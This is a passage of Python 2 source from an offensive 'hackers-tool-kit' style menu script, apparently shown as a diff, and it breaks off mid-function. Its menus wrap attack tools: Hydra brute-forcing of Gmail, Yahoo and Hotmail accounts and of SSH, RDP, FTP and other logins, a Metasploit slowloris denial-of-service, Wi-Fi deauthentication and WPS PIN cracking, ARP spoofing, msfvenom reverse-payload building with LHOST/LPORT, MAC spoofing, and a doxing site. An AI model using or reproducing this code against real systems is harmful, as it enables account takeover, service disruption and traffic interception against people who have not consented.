interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + 